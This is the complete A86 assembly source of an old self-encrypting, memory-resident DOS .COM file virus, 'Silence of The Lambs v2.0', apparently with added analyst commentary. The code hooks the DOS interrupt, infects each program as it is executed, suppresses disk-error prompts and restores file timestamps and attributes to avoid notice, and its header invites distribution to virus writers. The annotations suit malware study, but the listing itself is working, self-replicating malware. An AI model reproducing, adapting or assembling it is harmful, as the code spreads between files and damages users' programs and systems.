; Silence of The Lambs v2.0
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
;
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
; ANY MODIFICATIONS, UNLESS YOU ALSO INCLUDE
; THE ORIGINAL SOURCE.
;
; Assemble With A86.  (The listing is in A86 syntax -- `offset`, an
; untyped `push [eof]`, `jmp far 0000:0000` -- not NASM as the page
; header states; NASM would reject several of these lines as written.)
;

; ------------------------------------------------------------------
; Overview (analyst notes derived from this listing only)
;
; Memory-resident, appending .COM infector.  In an infected host the
; virus body occupies the first `total` bytes at 100h; the host's
; original `total` bytes are stored (XOR'd with the key) at the old end
; of the file, followed by the `append` stub that restores them at run
; time and restarts the host at 100h.
;
; Run-time sequence of this entry code:
;   1. dummy1/dummy2: decrypt enc_start..end with a running key,
;   2. enc_start: probe "am I resident?"; if not, shrink the top of
;      memory, copy the image there and hook INT 21h (ni21),
;   3. nomore: jump to the `append` stub (its offset is patched into
;      the `eof` immediate by infect).
;
; Every offset here is load-bearing (`equ $-1`, `$-2`, `$-4`,
; `offset enc_start-100h`, `3+total`): the code patches and copies
; itself by position, so nothing can be reordered or resized.
; ------------------------------------------------------------------
org 100h

jmp short dummy1
db 'DY'                    ; infection marker at 102h; infect compares
                           ; word [old+2] against it to skip reinfection

; Decryptor.  Everything before enc_start is written to the file in the
; clear (see the `offset enc_start-100h` copy in infect) and carries two
; immediates that infect patches for each new generation:
;   enc_key - starting key byte (PIT counter, `in al,40h`)
;   enc_add - per-byte key increment (second PIT read)
; Per byte: byte -= key; key += add.  This is the exact inverse of the
; `enc:` loop in infect (byte += key; key += add).
dummy1:
mov cx,length              ; bytes from enc_start to the end of the body
mov si,offset enc_start
mov ah,0                   ; <- key byte, patched in place (enc_key)
enc_key equ $-1
dummy2:
sub byte [si],ah
inc si
add ah,0                   ; <- increment byte, patched in place (enc_add)
enc_add equ $-1
loop dummy2

; Residency check and installation.  From here to the end of the body
; the bytes are stored encrypted in the file and decrypted by dummy2.
enc_start:
; "Already resident?"  INT 21h/AH=2Dh (set system time) with CH=FFh is
; an invalid hour, so genuine DOS answers AL=FFh.  The resident handler
; ni21 recognises AH=2Dh, CH=FFh, DH=CH and answers AL=0 instead.
mov ah,2Dh
mov ch,0FFh
mov dx,cx                  ; DH=CH=FFh: second half of the probe signature
int 21h
cmp al,0FFh
jne nomore                 ; AL != FFh: a copy already answered; skip install

; Go resident by carving pgfsize paragraphs off the top of this
; program's memory block.  DS := this program's MCB (the paragraph
; directly below the PSP).
mov ax,cs
dec ax
mov ds,ax
cmp byte [0],'Z'           ; only if this block is the last one in the chain
jne nomore

mov ax,word [3]            ; MCB size in paragraphs
sub ax,pgfsize
jc nomore                  ; block too small to give up pgfsize paragraphs
sub word [3],pgfsize       ; shrink the MCB ...
sub word [12h],pgfsize     ; ... and the PSP top-of-memory word (PSP:0002h
                           ; is MCB-relative 12h).  No MCB is written for
                           ; the detached paragraphs; they just stop being
                           ; part of the program's allocation.

; Copy the whole image to ES:100h in the detached area.  DS is still the
; MCB segment (CS-1), so DS:110h addresses the same bytes as CS:100h.
mov es,word [12h]
mov si,110h
mov di,100h
mov cx,total
cld
rep movsb

; Save the current INT 21h vector (IVT 0000:0084h) into the operand of
; the far jump at `old21` inside the high copy, then point the vector at
; ni21 in that copy.
xor ax,ax
mov ds,ax
mov si,84h
mov di,old21
movsw
movsw

cli
mov word [84h+2],es
mov word [84h],offset ni21
sti

; Hand control on.  Restore DS = ES = CS (installation changed DS).
nomore:
push cs
push cs
pop es
pop ds

; The immediate of this `mov` (`eof`) is patched by infect with the
; offset of the `append` stub inside the infected file
; (100h + host size + total).  In a freshly assembled, uninfected copy
; it stays 0000h, so `jmp bx` lands on CS:0000h -- the INT 20h that
; DOS places at the start of the PSP -- and the program simply exits.
mov bx,0000h ;return control to the
eof equ $-2 ;end user
jmp bx

; Trampoline: the jc/je sites in infect presumably lie beyond the
; +/-127-byte reach of an 8086 conditional jump to close:, so they
; branch here instead.
xclose: jmp close

; ------------------------------------------------------------------
; infect -- infect the file whose ASCIZ path ni21 copied to CS:0000h.
; Called only from ni21 (INT 21h/AX=4B00h hook), so CS is the resident
; segment; offsets 00F0h..00F7h of that segment serve as scratch:
;   00F0h        original attributes
;   00F2h/00F4h  original time / date
;   00F6h        offset of the `append` stub in the infected image
; In:  CS:0000h = target path.
; Clobbers: AX BX CX DX SI DI; sets DS = ES = CS.
; Skips: MZ/ZM executables, files already carrying the 'DY' marker,
; files whose low size word is < 0400h or >= 0FA00h.
; Side effects on the target: attributes cleared and restored,
; timestamp preserved, contents rewritten (see layout note below).
; ------------------------------------------------------------------
infect:
push cs
pop ds
push cs
pop es

db 0E4h,40h                ; IN AL,40h: PIT channel-0 counter byte, used
                           ; as this generation's starting key
mov byte [enc_key],al      ; self-patch the decryptor's key immediate

mov ax,4300h ;use CHMOD to get file attr
xor dx,dx                  ; DS:DX = path at CS:0000h
int 21h

mov [0F0h],cx ;store attr in PSP (scratch area below the resident copy)

mov ax,4301h ;clear file attr with CHMOD (read-only/hidden/system/archive)
xor cx,cx
int 21h

mov ax,3D02h ;open file for read / write
int 21h
xchg bx,ax                 ; BX = handle (on failure: the DOS error code)
lahf                       ; preserve CF ("open failed") across the next call
push ax
mov ax,5700h ;get file date & time
int 21h

mov [0F2h],cx
mov [0F4h],dx
pop ax
sahf
jc xclose                  ; NOTE(review): on open failure BX still holds the
                           ; error code and close: hands it to 5701h/3Eh as
                           ; if it were a handle (e.g. error 2 -> handle 2);
                           ; 00F2h/00F4h then hold whatever 5700h returned.

mov ah,3Fh ;read from file
mov cx,total               ; the head of the host that the body will replace
mov dx,old
int 21h

cmp byte [old+0],'M' ;exe MZ ?
je xclose
cmp byte [old+0],'Z' ;exe ZM ?
je xclose
cmp word [old+2],'YD' ;allready infected? (matches the db 'DY' marker at 102h)
je xclose

mov ax,4202h ;lseek to EOF
xor cx,cx
xor dx,dx
int 21h

; Size filter on the low word of the size only; DX (high word) is not
; examined.
cmp ah,0FAh
jae xclose                 ; >= 0FA00h: presumably no room for the two
                           ; appended copies within the 64K .COM limit
cmp ah,4
jb xclose                  ; < 0400h: too small

; Infected layout: [virus body, total][rest of host][host head XOR'd,
; total][append stub, applen].  The stub thus starts at
; 100h + size + total; the value is patched into `eof` further down.
add ax,total+100h
mov word [00F6h],ax

mov ah,40h ;write to EOF
mov cx,total
mov dx,old

; XOR the saved host head with the key before writing it; the append
; stub undoes this with the same key (append_enc).
push cx
mov al,byte [enc_key]
mov si,dx
enc_app:
xor byte [si],al
inc si
loop enc_app
pop cx

int 21h

mov ah,40h ;write to EOF
mov cx,applen              ; the restore stub, written in the clear
mov dx,offset append
int 21h

mov ax,4200h ;lseek to beginning of file
xor cx,cx
xor dx,dx
int 21h

; Patch `eof` (the `mov bx,imm` in nomore) for the copy about to be
; written; restored afterwards so the resident copy keeps its own value.
push [eof]
mov ax,word [00F6h]
mov [eof],ax

; Second PIT read supplies the per-byte key increment.  AH = key,
; DL = increment for the `enc:` loop below.
mov ah,byte [enc_key]
db 0E4h,40h                ; IN AL,40h
mov byte [enc_add],al      ; self-patch the decryptor's increment immediate
mov dl,al

; Build the outgoing image in `old`: the decryptor prefix is copied
; unchanged from the running (already patched) copy ...
mov si,100h
mov di,old

cld
mov cx,offset enc_start-100h
rep movsb

; ... and enc_start..end is written as byte += key; key += increment,
; the inverse of the dummy2 loop.
mov cx,length
enc:
lodsb
add al,ah
stosb
add ah,dl
loop enc

mov ah,40h ;write viral code over the first `total` bytes of the host
mov dx,old
mov cx,total
int 21h

pop [eof]
; Restore the timestamp (before the close, or DOS would stamp the
; file), close, then put the original attributes back.  This is also
; where the open-failure path lands.
close:
mov ax,5701h
mov cx,[00F2h]
mov dx,[00F4h]
int 21h

mov ah,3Eh ;close file
int 21h

mov ax,4301h
mov cx,[00F0h]
xor dx,dx
int 21h
ret

; ------------------------------------------------------------------
; append -- restore stub, written after the host's original end of
; file.  By the time it runs the body at 100h has decrypted, tried to
; install itself and jumped here through `eof`.  The stub executes from
; its own position high in the image, so it survives overwriting
; 100h..100h+total with the host's saved head.
; Self-location: `call $+3` pushes the address of `pop si`, so SI is
; the stub's own offset + 3; the saved head (total bytes, XOR'd)
; immediately precedes the stub.
; ------------------------------------------------------------------
append:
call $+3 ;replace org bytes -- first find our own address
pop si
sub si,3+total             ; SI = start of the saved host head
mov di,100h
mov cx,total
mov ah,byte [enc_key]      ; key from the decryptor prefix, still intact
                           ; at its fixed offset when this is read
append_enc:
lodsb
xor al,ah                  ; undo the XOR applied in infect (enc_app)
stosb
loop append_enc

mov ax,100h ;return IP to 100h when done
push ax

; "Zero regs": note that `and cx,cx` and `and di,di` only set flags.
; CX is already 0 after the loop, but DI is left at 100h+total.  None
; of the values DOS provides at program start are restored.
sub ax,ax ;zero regs
xor bx,bx
and cx,cx
sub dx,dx
xor si,si
and di,di
sub bp,bp

ret                        ; pops the 100h pushed above: restart the host
applen equ $-offset append

; ------------------------------------------------------------------
; ni21 -- resident INT 21h handler (vector set by enc_start).
;   AH=2Dh, CH=FFh, DH=CH : residency probe -> answer AL=0, return
;   AX=4B00h (EXEC)        : infect the program about to be run, then
;                            fall through to the original handler
;   everything else        : pass through (far jump via `old21`)
; ------------------------------------------------------------------
ni21:
pushf
cmp ah,2Dh
jne Not_Time
cmp ch,0FFh
jne Not_Time
cmp ch,dh                  ; the probe in enc_start set DX=CX, so DH=FFh
jne Not_time

mov Al,0                   ; "yes, resident" (genuine DOS would answer FFh)
popf
iret

Not_Time:
cld
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds

; Disabled in the original: would have turned INT 21h/AH=41h (delete
; file) into AH=3Ch (create/truncate).  Never assembled; kept as found.
; cmp ah,41h
; jne Not_Parse
; mov ah,3Ch
; cli
; add sp,18
; sti
; popf
; jmp old21-1

Not_Parse:
cmp ax,4B00h
jne Not_Exec

; Copy a fixed 128 bytes from the caller's DS:DX (ASCIZ path of the
; program being executed) to CS:0000h, whatever the string's length.
mov si,dx
push cs
pop es
xor di,di
mov cx,128
rep movsb

; Swap in a critical-error handler (ni24) that answers "ignore", so a
; disk error during infection does not raise the Abort/Retry/Fail
; prompt; the previous INT 24h vector is kept on the stack.  These
; INT 21h calls re-enter this handler and pass through to old21.
mov ax,3524h
int 21h
push es
push bx

push cs
pop ds

mov ax,2524h
mov dx,offset ni24
int 21h

call infect                ; infect before DOS loads and runs the target

pop dx
pop ds
mov ax,2524h
int 21h                    ; restore the original INT 24h vector

Not_Exec:
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
; Far jump to the saved original INT 21h vector; the 0000:0000 operand
; is overwritten at install time (the two `movsw` in enc_start).
jmp far 0000:0000
old21 equ $-4

; INT 24h (critical error) handler used while infecting: AL=0 tells DOS
; to ignore the error and continue.
ni24: mov al,0
iret

db 'The Silence Of The Lambs!$'   ; '$'-terminated text; not referenced
                                   ; by any instruction in this listing

; Size equates, all measured here at the end of the resident image.
total equ $-100h ;size -- bytes of the whole body, 100h..here
pgfsize equ (($*2)/16)+2   ; paragraphs taken from the top of memory:
                           ; 2*(100h+total)/16+2, i.e. room for the 100h
                           ; scratch area, the body, and the `old` buffer
                           ; of `total` bytes that follows it
length equ $-offset enc_start   ; bytes covered by the running-key cipher

old equ $                  ; I/O buffer (total bytes) directly after the
                           ; code; defines no bytes, exists only in memory

